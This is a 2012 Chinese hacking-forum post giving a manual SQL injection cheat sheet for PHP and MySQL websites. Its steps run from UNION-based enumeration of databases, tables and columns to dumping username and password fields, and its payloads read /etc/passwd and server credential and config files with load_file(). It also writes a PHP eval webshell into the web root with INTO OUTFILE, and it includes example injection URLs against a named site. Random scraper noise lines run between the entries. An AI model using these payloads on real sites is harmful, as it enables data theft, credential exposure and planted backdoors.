中国网络渗透测试联盟
标题:
PHP+MySQL 手工注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 13:50
标题:
PHP+MySQL 手工注入语句
.
: k x. j+ \' @9 ~, d6 C
; B8 H' y6 N. F' b0 {
暴字段长度
1 w( F$ O3 _9 c( k a
Order by num/*
' i' x& R2 Z7 q- a& C
匹配字段
1 ]: }4 `: ]7 F$ Y4 N
and 1=1 union select 1,2,3,4,5…….n/*
( o: Q: v2 c7 ~- U2 O8 I
暴字段位置
# L( Q3 U* x2 w% u! l* J3 L$ b J+ M
and 1=2 union select 1,2,3,4,5…..n/*
( p# h9 V# i. B$ L: Q( G/ U8 n# ]: H) l2 f
利用内置函数暴数据库信息
' }4 T, d3 r' G1 L. M3 t9 ^
version() database() user()
, s8 t9 T4 L! a d7 \; K+ M
不用猜解可用字段暴数据库信息(有些网站不适用):
: S2 d0 O" Y3 w& J1 B8 A
and 1=2 union all select version() /*
8 s7 P' c2 c1 ?1 \# R8 p
and 1=2 union all select database() /*
4 _; `7 r+ S; Z$ v
and 1=2 union all select user() /*
4 h: b6 g5 _& ^, Q% ~( t4 j. s
操作系统信息:
* ~! a l( z) B( _1 X# B: o
and 1=2 union all select @@global.version_compile_os from mysql.user /*
9 y3 M. U7 ^" m! R+ h7 k
数据库权限:
8 F0 M. X! J$ b' ?. M6 a; T9 |
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
2 X! z6 E% d1 T5 q& J
暴库 (mysql>5.0)
( m; p- {- a$ X$ @8 F
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
5 b$ S& N4 N3 z
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
: E6 w/ Z7 t, I9 @/ K( l/ o
猜表
5 Y% m. @6 @) `* v, Q2 Q: \+ d5 ]
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
$ W- H: A# X4 L
猜字段
, J3 A! M$ W+ ]/ `5 R, e
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
; H/ }: C+ q: ~, [8 g9 a/ V% l2 w
暴密码
2 [6 J3 y4 l( C
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
# ~' Y2 k0 Q' K! O/ U4 A+ r! G
高级用法(一个可用字段显示两个数据内容):
) h3 F2 A) L0 D/ x" ~( W8 G
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
r+ q) t9 u) w& M* Q, P
直接写马(Root权限)
0 c& E! Y+ r) _9 Y: Q+ @
条件:1、知道站点物理路径
$ W3 f x. e4 ~" H
2、有足够大的权限(可以用select …. from mysql.user测试)
& a2 L! U* K8 `2 t x! P' }# G
3、magic_quotes_gpc()=OFF
9 \7 d9 z' v2 |( t9 s' Q" U
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
3 T! h7 B2 j' V0 J- j+ `- E5 V
and 1=2 union all select 一句话HEX值 into outfile '路径'
- D1 S. Q4 y- u1 }+ W+ j& R: ?
load_file() 常用路径:
( f2 ?; X6 h7 @0 K/ K
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
! M7 G8 m! v6 D* k% j, \% H
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
, x2 w4 s- R q8 n& {$ C" u$ _
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
4 ~1 Q. A$ w4 A% v' R# p
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
& n* X& o0 ^8 M8 z/ k6 E
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
/ H9 @# ]) R$ }9 N0 `% L/ ^- ~
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
* K; |* N. v; l. e
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
0 l7 {8 h6 i" w% {$ t3 a1 c+ A
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
* A1 @" X J$ X0 E2 o% _2 ~6 q/ q
8、d:\APACHE\Apache2\conf\httpd.conf
7 W/ p$ y1 F# ^& g) u: l* W& T
9、C:\Program Files\mysql\my.ini
1 i" Z2 ?* `( ~4 _- Q
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
' t. `& W# \5 C+ i) \1 |
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
! t# e# `0 j2 P4 ?5 A3 }
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/ q1 N8 m% _ P$ |+ A3 h r
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
9 _0 l3 D3 I" O- ^. s- A1 Z
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
; ] b3 O* C+ d+ O' S
15、 /etc/sysconfig/iptables 本看防火墙策略
! b6 y8 T' q/ v; y( y
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
( q( s) W' J% ]$ {% p
17 、/etc/my.cnf MYSQL的配置文件
, E0 x8 p$ ]( @/ F" S) m# z
18、 /etc/redhat-release 红帽子的系统版本
; \/ d% E" U8 g4 P* w; G) ~ d' W
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
# E# \3 g ?; G# r! D4 o
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
$ y, w5 }' O$ }9 B+ U
21、/usr/local/app/php5 b/php.ini //PHP相关设置
% m* o+ d% D% s
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
& N7 S! X9 {- j7 ]
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
7 ~2 P5 H- y5 ]. A1 i4 d( `6 n. `9 |
24、c:\windows\my.ini
8 p4 y8 t$ l8 G5 |% x ^
25、c:\boot.ini
* {7 m8 }9 J: D4 _
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
6 [. `% p3 s2 D+ G0 [, i
注:
, ~! t2 z/ u" V0 b
Char(60)表示 <
! A- x1 q) s; A4 V8 P8 ]: m0 l
Char(32)表示 空格
7 |4 ]: o! d0 v( z u8 j
手工注射时出现的问题:
6 T& \% | D- i! Y$ o8 S- C
当注射后页面显示:
, s$ y) e1 x0 ^! |; g7 `
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
' ~$ M' t+ ?% {
如:
http://www.hake.ccc./mse/researc ... 0union%20select%201
,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
: b+ F$ d( a1 P# z# g) K1 I
这是由于前后编码不一致造成的,
; [* @! ?% b$ i5 w
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
) U5 \4 e U- g: V; x# C
http://www.hake.cc/mse/research/ ... 0union%20select%201
,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
8 R3 P1 \- k9 W7 N# f9 k
既可以继续注射了。。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2